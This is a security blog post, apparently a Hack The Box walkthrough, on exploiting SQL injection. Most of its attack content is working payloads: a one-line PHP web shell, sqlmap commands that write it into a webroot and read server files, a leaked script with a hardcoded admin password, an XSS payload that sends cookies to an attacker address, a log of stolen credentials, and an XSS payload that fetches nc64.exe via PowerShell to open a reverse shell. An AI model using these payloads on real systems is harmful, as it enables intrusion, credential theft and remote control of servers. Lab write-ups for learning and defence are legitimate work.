Several months have passed by without any new security publications. Hoping to unveil my current research at this time labelled “The Untold SQLi Attack.” I would like to show some few different ways of exploiting the popular vulnerability known as SQL injection. According to OWASP, SQL injection is the crafting of malicious sql queries through the input data from the client to the application. A successful SQL Injection (SQLi) can read, insert, update, delete, execute administration operations on the database, recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system(read more).
Without talking much, let’s get started
Testing for SQLi:
The above commands and methodology are what most of us are familiar with. When a database server and web server are run on the same system and share the same underlying file system, having an SQL injection and sufficient conditions (file permissions,DB privileges) are met then we can even upload a backdoor shell or read/download server configurations or files whose locations are generally predefined. Are there more ways of exploitations? Answer is Yes… Let’s see it.
You can see that the user has FILE privileges, as illustrated in the above screenshot, and we can use this to read / write files from the injection if the file system permissions allow this; To read / write files to the file system, MySQL runs a separate user account.
Great, we have a shell access to the server. Please note: This demonstration took place on a windows machine. When it comes to a linux machine, some commands and paths may vary.
File Write
root@kali:~/htb/# cat s2.php <?php echo shell_exec($_GET["cmd"]); ?> root@kali:~/htb/# sqlmap -r req2 --dbms mysql --file-write=s2.php --file-dest="C:/Inetpub/wwwroot/s2.php"
File Read
root@kali:~/htb/# sqlmap -r req2 --dbms mysql --file-read="C:/xampp/htdocs/adminbackdoorchecker.php"
root@kali:~/.sqlmap/output/10.10.x.x/files# cat C__xampp_htdocs_admin_backdoorchecker.php <?php include('../link.php'); include('auth.php'); $username = base64_decode(urldecode($_COOKIE['username'])); $password = base64_decode(urldecode($_COOKIE['password'])); $bad = array('$(','&'); $good = "ls"; if(strtolower(substr(PHP_OS,0,3)) == "win"){ $good = "dir"; } if($username == "admin" && $password == "Hopelessromantic"){ if(isset($_POST['cmd'])){ // FILTER ESCAPE CHARS foreach($bad as $char){ if(strpos($_POST['cmd'],$char) !== false){ die("You're not allowed to do that."); } } // CHECK IF THE FIRST 2 CHARS ARE LS if(substr($_POST['cmd'], 0,strlen($good)) != $good){ die("It's only allowed to use the $good command"); } if($_SERVER['REMOTE_ADDR'] == "::1"){ system($_POST['cmd']); } else{ echo "It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server."; } } } else{ echo "You are not allowed to use this function!"; }
Working XSS scripts !
<script> <img src=x onerror=this.src='http://10.10.14.10:8000/?c='+document.cookie></script>
root@kali:~/htb/# python3 -m http.server 8000 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.10.10.154 - - [29/Jan/2020 03:24:29] code 404, message File not found 10.10.10.154 - - [29/Jan/2020 03:24:29] "GET /bogus.php?output=username=YWRtaW4%3D;%20password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D;%20id=1 HTTP/1.1" 404 -
<script type="text/javascript">var Http = new XMLHttpRequest();var url='/admin/backdoorchecker.php'; var params='cmd=dir| powershell -c "iwr -uri http://10.10.14.10:8000/nc64.exe -outfile %temp%\a.exe";%temp%\a.exe -e cmd.exe 10.10.14.10 1111' ;Http.open("POST", url, true);Http.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');Http.send(params);</script>
Author : IG: that_faceless_coder
#TeamInveteck